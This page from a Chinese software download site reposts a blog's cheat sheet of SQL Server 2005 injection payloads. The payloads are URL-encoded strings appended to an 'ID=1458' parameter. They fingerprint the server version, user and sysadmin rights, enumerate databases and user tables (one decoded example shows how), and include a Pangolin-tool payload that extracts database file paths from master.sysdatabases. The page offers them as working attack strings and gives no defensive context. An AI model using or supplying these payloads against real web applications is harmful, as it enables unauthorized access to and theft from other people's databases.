您的位置: 飞扬精品软件园 >> 文章中心 >> 安全防线 >> 黑客技术 >> SQL2005注入语句
文章搜索:

最近文章更新

相关文章链接

本类文章排行

最新新闻资讯

本周下载排行

本月下载排行

    SQL2005注入语句

    SQL2005注入语句


    • 阅览次数: 文章来源: 原文作者: 整理日期: 2010-05-22

    ID=1458%20and%20@@version%3D0 判断版本
    ID=1458%20and%20db_name%28%29%3D0  数据库名
    ID=1458%20and%20@@servername%3D0 服务器名
    ID=1458%20and%20system_user%3D0  系统用户名
    D=1458%20and%20user%3D0 权限/DBO OR PUBLIC
    ID=1458%20and%20quotename%28is_srvrolemember%280x730079007300610064006D0069006E00%29%29%3D0  是否sysadmin,1是0否
    ID=1458%20and%20quotename%28db_name%281%29%29%3D0  判断数据库
    ID=1458%20and%20quotename%28db_name%282%29%29%3D0
    ID=1458%20and%20quotename%28db_name%283%29%29%3D0


    ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2032%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0
    ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2033%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0


    解密之后就是:
    ID=1458 and (select top 1 quotename(name) from Digicom.dbo.sysobjects where type=U AND name not in (select top 33 name from Digicom.dbo.sysobjects where type=U))=0

    下面是pangolin的:
    /add_item.asp?ID=1458%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([filename]%20as%20nvarchar(4000))%20from(select%20top%20%201%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
    得到数据库文件的路径.

    转自:KeLe's Blog http://52crack.com/

     



查看所有评论

网友对SQL2005注入语句的评论

我要发表评论
网名:
主题:
内容:
验证码:

软件更新 | 广告联系 | 版权声明 | 帮助中心 | 论坛交流 | | 闽ICP备10006809号

Copyright© 2007-2011 iCH8.Com  版权所有 All rights reserved.
Powered by: iCH8.Com  Skin by iCH8
文章中心部分文章摘自网络,版权归原作者所有!